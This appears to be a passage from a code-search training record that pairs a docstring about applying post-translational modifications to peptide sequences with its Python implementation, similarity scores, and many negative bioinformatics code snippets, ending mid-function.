"def _cpus(cls):\n # The real processor map is found at different paths based on cgroups version:\n # - cgroupsv1: /cpuset.cpus\n # - cgroupsv2: /cpuset.cpus.effective\n # For more details, see https://docs.kernel.org/admin-guide/cgroup-v2.html#cpuset-interface-files\n cpulist = None\n for path in [\n Path(\"/sys/fs/cgroup/cpuset/cpuset.cpus\"),\n Path(\"/sys/fs/cgroup/cpuset.cpus.effective\"),\n ]:\n if path.exists():\n cpulist = path.read_text(\"ascii\").strip()\n break\n else:\n raise RuntimeError(\"Could not find cgroups cpuset\")\n return ListFormatParser(cpulist).parse()",
"def cpu_ids() -> List[int]:\n api_file = open('/sys/devices/system/cpu/present', 'r')\n\n cpu_id_tmp = re.findall('\\d+|-', api_file.readline().strip())\n cpu_id_list = []\n for i in range(len(cpu_id_tmp)):\n if cpu_id_tmp[i] == '-':\n for cpu_id in range(int(cpu_id_tmp[i - 1]) + 1, int(cpu_id_tmp[i + 1])):\n cpu_id_list.append(int(cpu_id))\n else:\n cpu_id_list.append(int(cpu_id_tmp[i]))\n return cpu_id_list",
"def cpu(self) -> List[float]:\n return list(map(attrgetter(\"cpu\"), self.stats))"
] |
[
"0.616638",
"0.61011267",
"0.6081063",
"0.5938948",
"0.5843389",
"0.5820567",
"0.5801597",
"0.57924116",
"0.5734133",
"0.5724693",
"0.57013386",
"0.56822085",
"0.5660021",
"0.5649293",
"0.56469005",
"0.5628331",
"0.56077605",
"0.560498",
"0.5600769",
"0.557037",
"0.5559987",
"0.55577034",
"0.55496216",
"0.551584",
"0.5509583",
"0.55054814",
"0.55030096",
"0.54921395",
"0.54772353",
"0.54687786"
] |
0.6506117
|
0
|
Takes a peptide sequence and a set of modifications. Returns the modified version of the peptide sequence, c and nterm modifications. This modified version are hard coded in ms2pipfeatures_c.c for now.
|
def apply_mods(peptide, mods, PTMmap):
modpeptide = np.array(peptide[:], dtype=np.uint16) # Copy to avoid inplace changes
if mods != "-":
l = mods.split("|")
if len(l) % 2 != 0:
raise InvalidModificationFormattingError(mods)
for i in range(0, len(l), 2):
tl = l[i + 1]
try:
mod = PTMmap[tl]
except:
raise UnknownModificationError(tl)
try:
modpeptide[int(l[i])] = mod
except IndexError:
raise InvalidModificationFormattingError(
f"Amino acid position not in peptide for modifications: `{mods}`"
)
return modpeptide
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def define_seq_modifications():\n modifications = {\n '0': {\n 'colour': 'k',\n 'name': 'unmodified',\n },\n '1': {\n 'colour': 'firebrick',\n 'name': 'succinylated',\n 'target_res': 'LYS',\n 'replace_res': 'GLU',\n }\n }\n\n return modifications",
"def getRevCodonSeqs(self):\r\n compDict = {'A': 't', 'T': 'a', 'G': 'c', 'C': 'g'} # nuc compliments for reverse strand\r\n revPep = [] # list to hold the temporary reverse peptides before incorporation into the complete list\r\n for seq in self.allPepSeqs:\r\n revSeq = seq[::-1] # reverses the strand to be prepped for nt compliments\r\n for nuc in compDict:\r\n revSeq = revSeq.replace(nuc, compDict[nuc]) # replaces nt's with their compliments\r\n revSeq = revSeq.upper()\r\n revPep.append(revSeq)\r\n for i in revPep:\r\n self.allPepSeqs.append(i) # adds the reverse strand peptide to the list of possible peptide seqs\r\n return",
"def _parse_peptidoform(seq: str, modification_list: list[dict], charge: Union[int, None]):\n peptide = [\"\"] + list(seq) + [\"\"]\n\n # Add modification labels\n for mod in modification_list:\n peptide[int(mod[\"location\"])] += f\"[{mod['name']}]\"\n\n # Add dashes between residues and termini, and join sequence\n peptide[0] = peptide[0] + \"-\" if peptide[0] else \"\"\n peptide[-1] = \"-\" + peptide[-1] if peptide[-1] else \"\"\n proforma_seq = \"\".join(peptide)\n\n # Add charge state\n if charge:\n proforma_seq += f\"/{charge}\"\n\n return Peptidoform(proforma_seq)",
"def add_mods(tup):\n _, row = tup\n params = get_params()\n mod_versions = [dict()]\n\n # First add all fixed modifications\n for mod in params['modifications']:\n if mod['fixed']:\n if not mod['n_term'] and mod['amino_acid']:\n mod_versions[0].update({i:mod['name'] for i, aa in enumerate(row['peptide']) if aa == mod['amino_acid']})\n elif mod['n_term']:\n if mod['amino_acid']:\n if row['peptide'][0] == mod['amino_acid']:\n mod_versions[0]['N'] = mod['name']\n else:\n mod_versions[0]['N'] = mod['name']\n\n # Continue with variable modifications\n for mod in params['modifications']:\n if mod['fixed']:\n continue\n\n # List all positions with specific amino acid, to avoid combinatorial explotion, limit to 4 positions\n all_pos = [i for i, aa in enumerate(row['peptide']) if aa == mod['amino_acid']]\n if len(all_pos) > 4:\n all_pos = all_pos[:4]\n for version in mod_versions:\n # For non-position-specific mods:\n if not mod['n_term']:\n pos = [p for p in all_pos if p not in version.keys()]\n combos = [x for l in range(1, len(pos) + 1) for x in combinations(pos, l)]\n for combo in combos:\n new_version = version.copy()\n for pos in combo:\n new_version[pos] = mod['name']\n mod_versions.append(new_version)\n\n # For N-term mods and N-term is not yet modified:\n elif mod['n_term'] and 'N' not in version.keys():\n # N-term with specific first AA:\n if mod['amino_acid']:\n if row['peptide'][0] == mod['amino_acid']:\n new_version = version.copy()\n new_version['N'] = mod['name']\n mod_versions.append(new_version)\n # N-term without specific first AA:\n else:\n new_version = version.copy()\n new_version['N'] = mod['name']\n mod_versions.append(new_version)\n\n df_out = pd.DataFrame(columns=row.index)\n df_out['modifications'] = ['|'.join('{}|{}'.format(0, value) if key == 'N'\n else '{}|{}'.format(key + 1, value) for key, value\n in version.items()) for version in mod_versions]\n df_out['modifications'] = ['-' if not mods else mods for mods in df_out['modifications']]\n df_out['spec_id'] = ['{}_{:03d}'.format(row['spec_id'], i) for i in range(len(mod_versions))]\n df_out['charge'] = row['charge']\n df_out['peptide'] = row['peptide']\n if 'protein_list' in row.index:\n df_out['protein_list'] = str(row['protein_list'])\n return df_out",
"def modify_SEQ(self, seq_in, cigar_list_in):\n seq = seq_in[:] # Make a copy.\n cigar_list = cigar_list_in[:]\n # Placeholder for the new sequence.\n new_seq = \"\"\n for item in cigar_list:\n # Number of operations.\n num = int(item[:-1])\n # Operation.\n letter = item[-1]\n if letter == \"M\" and num == len(seq_in):\n return seq_in\n if True:\n # Matches or mismatches.\n if letter in [\"M\", \"X\"]:\n new_seq += seq[:num]\n seq = seq[num:]\n\n # Hard-clips or skipped regions.\n elif letter in [\"H\", \"N\"]:\n seq = seq[num:]\n new_seq += num * \" \"\n # Deletions.\n elif letter == \"D\":\n seq = seq[num:]\n new_seq += num * \"~\"\n # Paddings, insertions, soft-clips.\n elif letter in [\"P\", \"I\", \"S\"]:\n seq = seq[num:]\n # Sequence match.\n elif letter == \"=\":\n new_seq = seq\n\n return new_seq",
"def get_complex_modifications(complex_modification_file, protein_complex_file):\n\n complex_mods = pandas.read_table(fixpath(complex_modification_file))\n complex_mods = complex_mods.set_index('Modified_enzyme')\n\n complex_set = \\\n set(get_complex_subunit_stoichiometry(protein_complex_file).keys())\n\n # ignore complexes which are produced in the reaction matrix\n rxn_dict = get_reaction_matrix_dict('reaction_matrix.txt',\n complex_set=complex_set)\n ignored_complexes = set()\n for met_stoich in rxn_dict.values():\n for met, value in iteritems(met_stoich):\n if 'mod_c' not in met:\n ignored_complexes.add(met.replace('_c', ''))\n else:\n ignored_complexes.add(met)\n # don't ignore these. They are included in the reaction matrix but still\n # must be formed via a complex formation reaction\n # TODO look into this list closer\n ignored_complexes.remove('CPLX0-782_mod_2:4fe4s')\n\n new_mod_dict = {}\n for key, value in iteritems(complex_mods.T.to_dict()):\n if key.startswith('#') or key in ignored_complexes:\n continue\n key = key.replace('_DASH_', '__')\n new_mod_dict[key] = {}\n new_mod_dict[key]['core_enzyme'] = value['Core_enzyme']\n new_mod_dict[key]['modifications'] = {}\n for mods in value['Modifications'].split(' AND '):\n mod, num_mods = mods.rstrip(')').split('(')\n if num_mods == '':\n num_mods = 1.\n else:\n num_mods = float(num_mods)\n\n mod = mod.replace('_DASH_', '__')\n new_mod_dict[key]['modifications'][mod + '_c'] = -num_mods\n\n new_mod_dict = corrections.correct_complex_modification_dict(new_mod_dict)\n\n return new_mod_dict",
"def main(argv=None):\n\n if argv is None:\n argv = sys.argv\n\n parser = E.OptionParser(\n version=\"%prog version: $Id: optic/cds2codons.py 2781 2009-09-10 11:33:14Z andreas $\")\n\n parser.add_option(\"-m\", \"--map\", dest=\"filename_map\", type=\"string\",\n help=\"filename with mapping information.\")\n parser.add_option(\"-f\", \"--format\", dest=\"format\", type=\"string\",\n help=\"output file format [fasta-codons].\")\n parser.add_option(\"-c\", \"--codons\", dest=\"codons\", action=\"store_true\",\n help=\"print codons separated by spaces.\")\n\n parser.set_defaults(\n filename_cds=None,\n codons=False,\n format=\"fasta\",\n filename_map=None,\n )\n\n (options, args) = E.Start(parser, add_pipe_options=True)\n\n if not options.filename_map:\n raise \"please supply filename with map between peptide to cds.\"\n\n if options.filename_map:\n map_old2new = {}\n for line in open(options.filename_map, \"r\"):\n if line[0] == \"#\":\n continue\n m = Map()\n m.Read(line)\n map_old2new[m.mToken] = m\n else:\n map_old2new = {}\n\n if options.filename_cds:\n sequences = Genomics.ReadPeptideSequences(\n open(options.filename_cds, \"r\"))\n else:\n sequences = Genomics.ReadPeptideSequences(sys.stdin)\n\n if options.loglevel >= 1:\n print \"# read %i sequences\" % len(sequences)\n sys.stdout.flush()\n\n ninput, nskipped, noutput, nerrors, nstops = 0, 0, 0, 0, 0\n\n for key, s in sequences.items():\n\n ninput += 1\n\n if key not in map_old2new:\n nskipped += 1\n continue\n\n out_seq = []\n\n m = map_old2new[key]\n m.Expand()\n mm = m.mMapOld2New\n\n if mm.getColTo() > len(s):\n options.stderr.write(\"# error for %s: sequence shorter than alignment: %i < %i\\n\" % (\n key, len(s), mm.getColTo()))\n nerrors += 1\n continue\n\n for x in range(mm.getRowFrom(), mm.getRowTo() + 1):\n\n y = mm.mapRowToCol(x)\n if y > 0:\n out_seq.append(s[y - 1])\n\n m.Clear()\n\n out_seq = \"\".join(out_seq)\n translation = Genomics.TranslateDNA2Protein(out_seq)\n\n if \"X\" in translation:\n nstops += 1\n\n if options.codons:\n out_seq = \" \".join([out_seq[x:x + 3]\n for x in range(0, len(out_seq), 3)])\n\n noutput += 1\n options.stdout.write(\">%s\\n%s\\n\" % (key, out_seq))\n\n options.stderr.write(\"# input=%i, output=%i, errors=%i, stops=%i\\n\" % (\n ninput, noutput, nerrors, nstops))\n\n E.Stop()",
"def annotate_effect(cds_dict, genome, snp):\n # List to save the coding effect\n coding_effect = []\n \n # Change the SNP position from 1-indexed to 0-indexed\n snp = (snp[0]-1, snp[1])\n \n # Determine which genes the SNP is located in\n genes = []\n for k,v in cds_dict.items():\n if snp[0] in range(v.location.start, v.location.end): \n genes.append(k)\n # Check that SNP is in a gene\n if genes: \n # Some SNPs will be in more than one gene, SARS has overlaping ORFs\n for gene in genes: \n gene_tuple = list(zip(list(cds_dict[gene].location), cds_dict[gene].location.extract(genome)))\n # Get the indicies relative to the gene, add 1 to get 1-indexed values\n indicies = [x + 1 for x, y in enumerate(gene_tuple) if y[0] == snp[0]]\n # Determine codon position from gene index\n for i in indicies:\n # First position in codon\n if i % 3 == 1:\n codonpos = 1\n wtcodon = [gene_tuple[i-1], gene_tuple[i], gene_tuple[i+1]]\n # Second position in codon\n elif i % 3 == 2:\n codonpos = 2\n wtcodon = [gene_tuple[i-2], gene_tuple[i-1], gene_tuple[i]]\n # Third position in codon \n elif i % 3 == 0:\n codonpos = 3\n wtcodon = [gene_tuple[i-3], gene_tuple[i-2], gene_tuple[i-1]]\n \n # From the wt codon sequence, determine the alterative codon, coding change, and effect\n altcodon = [snp if i == (codonpos-1) else b for i, b in enumerate(wtcodon)]\n wtaa = translate(\"\".join(y for x,y in wtcodon))\n altaa = translate(\"\".join(y for x,y in altcodon))\n if wtaa == altaa:\n effect = \"synonymous\"\n elif wtaa != altaa and altaa == '*':\n effect = \"nonsense\"\n elif wtaa != altaa and altaa != '*':\n effect = \"missense\"\n # Save the codon effects and information\n coding_effect.append((codonpos, f\"{wtaa}{-(i // -3)}{altaa}\", effect, gene))\n # If the SNP isn't in a gene, it's intergeneic and has no coding effect\n else:\n coding_effect.append((\"NA\", \"NA\", \"NA\", \"intergeneic\"))\n \n \n # Deal with SNPs in multiple genes with multiple effects \n if len(coding_effect) == 1:\n return list(coding_effect[0])\n else: \n if len(set([(a,b,c) for a,b,c,d in coding_effect])) == 1: \n return list(list(set(coding_effect))[0])\n # TODO: Deal with ambiguous sequences\n else:\n return [\"NA\", \"NA\", \"NA\", \"ambiguous\"]",
"def test_sequence_modify(self):\n self.t(\"1,2 modify +xyz\")\n code, out, err = self.t(\"_get 1.tags 2.tags\")\n self.assertEqual(\"xyz xyz\\n\", out)",
"def mutate(self, generation):\n new_generation = []\n for chromosome in generation:\n if self.show_mutation_internals:\n print(\"\\nChromosome being worked on: \", chromosome, \"\\n\")\n chromosome_bit_array = []\n for char in chromosome:\n binary_char = bin(ord(char))\n if self.show_mutation_internals:\n print(\"Char: \", char, \" ASCII #:\", ord(char), \" Binary Char:\", binary_char)\n new_binary_char_array = ['0', 'b', '1']\n for bit in binary_char[3:]:\n if self.decision(self.mutation_rate):\n flipped_bit = int(bit) ^ 1\n if self.show_mutation_internals:\n print(\"Bit: \", str(bit), \" Flipped Bit:\", str(flipped_bit))\n new_binary_char_array.append(str(flipped_bit))\n else:\n if self.show_mutation_internals:\n print(\"Bit: \", str(bit))\n new_binary_char_array.append(str(bit))\n new_binary_char = ''.join(new_binary_char_array)\n if self.show_mutation_internals:\n print(\"New Char:\", chr(int(new_binary_char, 2)), \" ASCII #:\",\n int(new_binary_char, 2), \" Binary Char:\", new_binary_char, \"\\n\")\n chromosome_bit_array.append(new_binary_char)\n new_chromosome = self.bit_array_to_string(chromosome_bit_array)\n if self.show_mutation_internals:\n print(\"Chromosome pre-mutation: \", chromosome)\n print(\"Chromosome post-mutation: \", new_chromosome, \"\\n\")\n new_generation.append(new_chromosome)\n return new_generation",
"def proteinTranslation(seq, geneticCode = STANDARD_GENETIC_CODE):\n\n seq = seq.replace('T','U') # Make sure we have RNA sequence\n proteinSeq = []\n \n i = 0\n while i+2 < len(seq):\n \n codon = seq[i:i+3]\n aminoAcid = geneticCode[codon]\n \n if aminoAcid is None: # Found stop codon\n break\n\n proteinSeq.append(aminoAcid)\n i += 3\n\n return proteinSeq",
"def translate_sequence(sequence, genetic_code = {'GUC': 'V', 'ACC': 'T', 'GUA': 'V', 'GUG': 'V', 'ACU': 'T', 'AAC': 'N', 'CCU': 'P', 'UGG': 'W', 'AGC': 'S', 'AUC': 'I', 'CAU': 'H', 'AAU': 'N', 'AGU': 'S', 'GUU': 'V', 'CAC': 'H', 'ACG': 'T', 'CCG': 'P', 'CCA': 'P', 'ACA': 'T', 'CCC': 'P', 'UGU': 'C', 'GGU': 'G', 'UCU': 'S', 'GCG': 'A', 'UGC': 'C', 'CAG': 'Q', 'GAU': 'D', 'UAU': 'Y', 'CGG': 'R', 'UCG': 'S', 'AGG': 'R', 'GGG': 'G', 'UCC': 'S', 'UCA': 'S', 'UAA': '*', 'GGA': 'G', 'UAC': 'Y', 'GAC': 'D', 'UAG': '*', 'AUA': 'I', 'GCA': 'A', 'CUU': 'L', 'GGC': 'G', 'AUG': 'M', 'CUG': 'L', 'GAG': 'E', 'CUC': 'L', 'AGA': 'R', 'CUA': 'L', 'GCC': 'A', 'AAA': 'K', 'AAG': 'K', 'CAA': 'Q', 'UUU': 'F', 'CGU': 'R', 'CGC': 'R', 'CGA': 'R', 'GCU': 'A', 'GAA': 'E', 'AUU': 'I', 'UUG': 'L', 'UUA': 'L', 'UGA': '*', 'UUC': 'F'}, start_pos = 0):\n #find first orf\n #first_orf_seq = find_first_orf(sequence)\n\n # ensure sequence is uppercase\n seq = sequence.upper()\n\n #translate the sequence\n protein = \"\"\n for i in range(0, len(seq) - (len(seq) % 3), 3):\n codon = seq[i:i + 3]\n if genetic_code[codon] == \"*\":\n break\n protein += genetic_code[codon]\n return protein",
"def editsequence(dna, source_sequence, destination_sequence=None, start=0, end=None, strand=1, product=None, process_name=None, \n process_description=None, pn=None, pd=None, quinable=True, **kwargs):\n kwargs.setdefault(\"_sourcefile\", None) \n kwargs.setdefault(\"process_id\", None)\n kwargs.setdefault(\"original_ids\", []) \n _sourcefile = kwargs[\"_sourcefile\"] \n process_id = kwargs[\"process_id\"] \n original_ids = kwargs[\"original_ids\"]\n\n project = None\n project = project if product is None else product\n process_name = pn if process_name is None else process_name\n process_description = pd if process_description is None else process_description\n\n dna = copy.deepcopy(dna) \n start = 0 if start == len(dna.seq) else start\n end = len(dna.seq) if end is None else end\n strand = 1 if strand is None else strand \n if start == 0 and end == len(dna.seq):\n subject = dna.seq\n else:\n subject = dna.printsequence(start, end, strand)\n\n _mode = \"edit\"\n feat_list = [] \n if source_sequence is None:\n segment = dna.__class__(seq=re.sub(subject, value, subject, quinable=0)) \n else:\n source = source_sequence.upper() \n query = source \n if strand == 1 or strand == -1:\n if destination_sequence is None:\n _mode = \"search\"\n feature_list = get_matchlist_regex(dna, query, value=None, subject=subject, s=start, e=end, strand=strand) \n else:\n segment = get_matchlist_regex(dna, query, value=destination_sequence, subject=subject, s=start, e=end, strand=strand) \n else:\n ValueError(\"When edit the sequence, the sequence strand to be edit should be '-1' or '+1.'\")\n \n if _mode == \"edit\":\n segment._history_feature = dna._history_feature\n if start == 0 and end == len(dna.seq):\n new_dna = segment\n elif start == 0:\n new_dna = joindna(segment, cropdna(dna,e,len(dna.seq)))\n elif end == len(dna.seq):\n new_dna = joindna(cropdna(dna,0,s), segment)\n else:\n new_dna = joindna(cropdna(dna, 0, s), segment, cropdna(dna, e, len(dna.seq))) \n \n if dna.topology == \"circular\":\n new_dna._topology = \"circular\"\n else:\n pass \n\n original_id = dna._product_id\n if project is None:\n new_dna._unique_id = dna._unique_id\n else:\n new_dna._unique_id = project\n \n history_features = [new_dna._history_feature] \n if type(source_sequence) == new_dna.seq.__class__:\n if source_sequence.parental_class == \"DNAFeature\":\n qkey = source_sequence.qkey\n for qindex, qfeat in enumerate(new_dna.__class__.queried_features_dict[qkey]):\n if qfeat._second_id == source_sequence.parental_id:\n break\n \n if type(source_sequence.item) == int:\n fsource = \"QUEEN.queried_features_dict['{}'][{}].{}[{}]\".format(qkey, qindex, \"seq\" , source_sequence.item)\n \n elif type(source_sequence.item) == slice:\n sl_start = source_sequence.item.start \n sl_stop = source_sequence.item.stop \n sl_step = source_seqeunce.item.step\n sl_start = \"\" if sl_start is None else sl_start\n sl_stop = \"\" if sl_stop is None else sl_stop\n if sl_step == 1 or sl_step == None:\n fsource = \"QUEEN.queried_features_dict['{}'][{}].seq[{}:{}]\".format(qkey, qindex, sl_start, sl_stop)\n else:\n fsource = \"QUEEN.queried_features_dict['{}'][{}].seq[{}:{}:{}]\".format(qkey, qindex, sl_start, sl_stop, sl_step)\n \n else:\n fsource = \"QUEEN.queried_features_dict['{}'][{}].seq\".format(qkey, qindex)\n history_features.append(source_sequence.parent.subject._history_feature) \n\n elif source_sequence.parental_class == \"QUEEN\": \n parental_id = source_sequence.parental_id\n if source_sequence.name != None: \n if \"printsequence\" in source_sequence.name:\n if len(source_sequence.name.split(\"_\")) == 2: \n seqname = \"QUEEN.dna_dict['{}'].printsequence(strand={})\".format(parental_id, source_sequence.name.split(\"_\")[-1]) \n else:\n seqname = \"QUEEN.dna_dict['{}'].printsequence(start={}, end={}, strand={})\".format(parental_id, *source_sequence.name.split(\"_\")[1:])\n elif source_sequence.name == \"rcseq\":\n seqname = \"QUEEN.dna_dict['{}'].rcseq\".format(parental_id) \n else:\n seqname = \"QUEEN.dna_dict['{}'].seq\".format(parental_id)\n \n if type(source_sequence.item) == int:\n fsource = \"{}[{}]\".format(seqname, source_sequence.item)\n \n elif type(source_sequence.item) == slice:\n sl_start = source_sequence.item.start\n sl_stop = source_sequence.item.stop \n sl_step = source_sequence.item.step\n sl_start = \"\" if sl_start is None else sl_start\n sl_stop = \"\" if sl_stop is None else sl_stop\n if sl_step == 1 or sl_step == None:\n fsource = \"{}[{}:{}]\".format(seqname, sl_start, sl_stop)\n else:\n fsource = \"{}[{}:{}:{}]\".format(seqname, sl_start, sl_stop, sl_step)\n else:\n fsource = \"{}\".format(seqname)\n history_features.append(source_sequence.parent._history_feature) \n \n elif source_sequence.parental_class == \"Cutsite\":\n if source_sequence.parent.name not in cs.defaultkeys:\n cs.new_cutsites.add((source_sequence.parent.name, source_origin.parent.cutsite)) \n fsource = \"cs.lib['{}'].{}\".format(source_sequence.parent.name, source_sequence.name)\n else:\n fsourcee = \"'{}'\".format(source_sequence) \n else:\n fsource = \"'{}'\".format(source_sequence)\n \n if quinable == True: \n source_sequence = repr(source_sequence) if source_sequence is not None else None\n destination_sequence = repr(destination_sequence) if destination_sequence is not None else None\n project = \"\" \n fproduct = \"\" if product is None else \", product='\" + product + \"'\"\n process_name = \"\" if process_name is None else \", process_name='\" + process_name + \"'\"\n process_description = \"\" if process_description is None else \", process_description='\" + process_description + \"'\" \n \n new_dna._product_id = new_dna._unique_id if product is None else product \n if start == 0 and end == len(dna.seq):\n building_history = \"QUEEN.dna_dict['{}'] = editsequence(QUEEN.dna_dict['{}'], source_sequence={}, destination_sequence={}, strand={}{}{}{}{})\".format(new_dna._product_id, original_id, fsource, destination_sequence, strand, project, fproduct, process_name, process_description)\n else: \n building_history = \"QUEEN.dna_dict['{}'] = editsequence(QUEEN.dna_dict['{}'], source_sequence={}, destination_sequence={}, start={}, end={}, strand={}{}{}{}{})\".format(new_dna._product_id, original_id, fsource, destination_sequence, start, end, strand, project, fproduct, process_name, process_description)\n if len(history_features) > 1:\n history_feature = _combine_history(new_dna, history_features) \n new_dna._history_feature = history_feature\n process_id, original_ids = make_processid(new_dna, building_history, process_id, original_ids)\n add_history(new_dna, [building_history, \"source: {}; destination: {}; start: {}; end: {}; strand: {}\".format(source_sequence, destination_sequence, start, end, strand), \",\".join([process_id] + original_ids)], _sourcefile) \n new_dna._check_uniqueness()\n if product is None:\n pass \n else:\n if _mode == \"edit\":\n product = product.replace(\" \",\"\")\n match = re.fullmatch(\"(.+)\\[(.+)\\]\", product) \n if match:\n if match.group(2).isdecimal() == True:\n new_dna.__class__._namespace[match.group(1)][int(match.group(2))] = new_dna\n else:\n new_dna.__class__._namespace[match.group(1)][match.group(2)] = new_dna\n else: \n new_dna.__class__._namespace[product] = new_dna\n else:\n pass \n if _mode == \"edit\":\n return new_dna\n else:\n return feature_list",
"def modifications(self, components=['model', 'sheets', 'projections']):\n mapping = {'model': [self],\n 'sheets':self.sheets,\n 'projections':self.projections}\n\n lines = []\n for component in components:\n heading = \"=\" * len(component)\n lines.extend([heading, component.capitalize(), heading, ''])\n specs = mapping[component]\n padding = max(len(str(spec)) for spec in specs)\n for spec in sorted(specs):\n modified = [str(el) for el in sorted(spec.modified_parameters)]\n lines.append(\"%s : [%s]\" % (str(spec).ljust(padding), \", \".join(modified)))\n lines.append('')\n print \"\\n\".join(lines)",
"def build_model_mutator(self):\n\n\t\tprint \"beginning mutation procedure\"\n\t\twith open(self.rootdir+self.template[0][0]+'.pdb','r') as fp: lines = fp.readlines()\n\t\t\n\t\tregex_seqres = '^SEQRES\\s+[0-9]+\\s+([A-Z])\\s+[0-9]+\\s+(.+)'\n\t\tregex_remark = '^REMARK\\s300\\s([A-Z]+)\\s+'\n\t\t#---if SEQRES is present we get the sequence from it\n\t\t#---note that the seqres protocol below should handle missing residues even if they exist\n\t\t#---...at the beginning of the target sequence\n\t\tif any([re.match(regex_seqres,line) for line in lines]):\n\t\t\tseqresli = [li for li,l in enumerate(lines) if re.match(regex_seqres,l)]\n\t\t\tseqraw = [re.findall(regex_seqres,lines[li])[0] for li in seqresli]\n\t\t\tsequence = ''.join([''.join([aacodemap[j] for j in i[1].split()]) \n\t\t\t\tfor i in seqraw if i[0] == self.template[0][1]])\n\t\t\tmissingli = [re.findall('^REMARK\\s+([0-9]+)\\sMISSING RESIDUES',l)[0] for li,l in enumerate(lines) \n\t\t\t\tif re.match('^REMARK\\s+([0-9]+)\\sMISSING RESIDUES',l)]\n\t\t\tif missingli != []:\n\t\t\t\tif len(missingli)>1: raise Exception('cannot parse multiple MISSING RESIDUE notes')\n\t\t\t\tmissingli = str(missingli[0])\n\t\t\t\tstartres = int([\n\t\t\t\t\tre.findall('^REMARK\\s+'+missingli+'\\s+[A-Z]{3}\\s+[A-Z]\\s+([0-9]+)',l)[0] \n\t\t\t\t\tfor li,l in enumerate(lines)\n\t\t\t\t\tif re.match('^REMARK\\s+'+missingli+'\\s+[A-Z]{3}\\s+[A-Z]\\s+[0-9]+',l)][0])\n\t\t\telse: startres = int([line for line in lines if re.match('^ATOM',line)][0][22:25+1])\n\t\telif any([re.match(regex_remark,line) for line in lines]):\n\t\t\tseqresli = [li for li,l in enumerate(lines) if re.match(regex_remark,l)]\n\t\t\tseqraw = [re.findall(regex_remark,lines[li])[0] for li in seqresli]\n\t\t\tsequence = ''.join(seqraw)\n\t\t\tstartres = int([line for line in lines if re.match('^ATOM',line)][0][22:25+1])\n\t\telse: raise Exception('need either REMARK 300 or SEQRES in your pdb file')\n\t\t\t\n\t\tself.target = []\n\t\tfor mi,mut in enumerate(self.settings['mutations']):\n\t\t\tsequence_mut = list(sequence)\n\t\t\tif sequence[mut[1]-startres] != mut[0]: \n\t\t\t\tmsg = [\n\t\t\t\t\t'USER ERROR!',\n\t\t\t\t\t'sequence: '+sequence,\n\t\t\t\t\t'starting residue number from ATOM record: '+str(startres),\n\t\t\t\t\t'expecting '+str(mut[0])+' at position '+str(mut[1]),\n\t\t\t\t\t'however reading '+str(sequence[mut[1]-startres])+' at that position!',\n\t\t\t\t\t]\n\t\t\t\traise Exception('\\n'.join(msg))\n\t\t\telse: sequence_mut[mut[1]-startres] = mut[2]\n\t\t\tsequence_mut = ''.join(sequence_mut)\n\t\t\tprint 'template sequence = '+sequence\n\t\t\tprint 'mutated sequence = '+sequence_mut\n\t\t\tself.target.append(['mutation'+str(mi),sequence_mut])\n\t\tfor mi,mut in enumerate(self.settings['mutations']):\n\t\t\tprint 'building homology model for mutation '+str(mi)\n\t\t\tself.settings['target_name'] = self.target[mi][0]\n\t\t\t#---we explicitly encode the mutation in the filename so that it can be retrieved later\n\t\t\t#---...particularly in ???\n\t\t\tbatchdir = 'model-v'+('%05d'%(mi))+'-'+self.template[0][0]+'_chain'+self.template[0][1]+\\\n\t\t\t\t'_mut'+''.join([str(j) for j in mut])+'/'\n\t\t\tself.build_model_single(batchdir_override=batchdir,startres=startres)",
"def kaggle_mutator(modified_content, values, document):\r\n is_abusive = 1 if (sum(document[attribute_mask]) > 0) else 0\r\n\r\n modified_document = [values[0], is_abusive] + values[1:] + [modified_content]\r\n return modified_document",
"def truncate(self, Ls=None, germs=None, prepStrs=None, effectStrs=None, seqs=None):\n Ls = self.Ls if (Ls is None) else Ls\n germs = self.germs if (germs is None) else germs\n prepStrs = self.prepStrs if (prepStrs is None) else prepStrs\n effectStrs = self.effectStrs if (effectStrs is None) else effectStrs\n cpy = LsGermsStructure(Ls, germs, prepStrs,\n effectStrs, self.aliases, self.sequenceRules)\n\n #OLD iPreps = [i for i, prepStr in enumerate(self.prepStrs) if prepStr in prepStrs]\n #OLD iEffects = [i for i, eStr in enumerate(self.effectStrs) if eStr in effectStrs]\n #OLD fidpairs = list(_itertools.product(iPreps, iEffects))\n all_fidpairs = list(_itertools.product(list(range(len(prepStrs))), list(range(len(effectStrs)))))\n\n for (L, germ), plaq in self._plaquettes.items():\n basestr = plaq.base\n if seqs is None:\n fidpairs = all_fidpairs\n else:\n fidpairs = []\n for i, j in all_fidpairs:\n if prepStrs[i] + basestr + effectStrs[j] in seqs:\n fidpairs.append((i, j))\n\n if (L in Ls) and (germ in germs):\n cpy.add_plaquette(basestr, L, germ, fidpairs)\n\n cpy.add_unindexed(self.unindexed) # preserve unindexed strings\n return cpy",
"def compute_one_patch(sess, experiment, output_fetches, inputs_1d,\n residue_index, prob_weights, batch, length, i, j,\n crop_size_x, crop_size_y):\n # Note that these are allowed to go off the end of the protein.\n end_x = i + crop_size_x\n end_y = j + crop_size_y\n crop_limits = np.array([[i, end_x, j, end_y]], dtype=np.int32)\n ic = max(0, i)\n jc = max(0, j)\n end_x_cropped = min(length, end_x)\n end_y_cropped = min(length, end_y)\n prepad_x = max(0, -i)\n prepad_y = max(0, -j)\n postpad_x = end_x - end_x_cropped\n postpad_y = end_y - end_y_cropped\n\n # Precrop the 2D features:\n inputs_2d = np.pad(batch['inputs_2d'][\n :, jc:end_y, ic:end_x, :],\n [[0, 0],\n [prepad_y, postpad_y],\n [prepad_x, postpad_x],\n [0, 0]], mode='constant')\n assert inputs_2d.shape[1] == crop_size_y\n assert inputs_2d.shape[2] == crop_size_x\n\n # Generate the corresponding crop, but it might be truncated.\n cxx = batch['inputs_2d'][:, ic:end_x, ic:end_x, :]\n cyy = batch['inputs_2d'][:, jc:end_y, jc:end_y, :]\n if cxx.shape[1] < inputs_2d.shape[1]:\n cxx = np.pad(cxx, [[0, 0],\n [prepad_x, max(0, i + crop_size_y - length)],\n [prepad_x, postpad_x],\n [0, 0]], mode='constant')\n assert cxx.shape[1] == crop_size_y\n assert cxx.shape[2] == crop_size_x\n if cyy.shape[2] < inputs_2d.shape[2]:\n cyy = np.pad(cyy, [[0, 0],\n [prepad_y, postpad_y],\n [prepad_y, max(0, j + crop_size_x - length)],\n [0, 0]], mode='constant')\n assert cyy.shape[1] == crop_size_y\n assert cyy.shape[2] == crop_size_x\n inputs_2d = np.concatenate([inputs_2d, cxx, cyy], 3)\n\n output_results = sess.run(output_fetches, feed_dict={\n 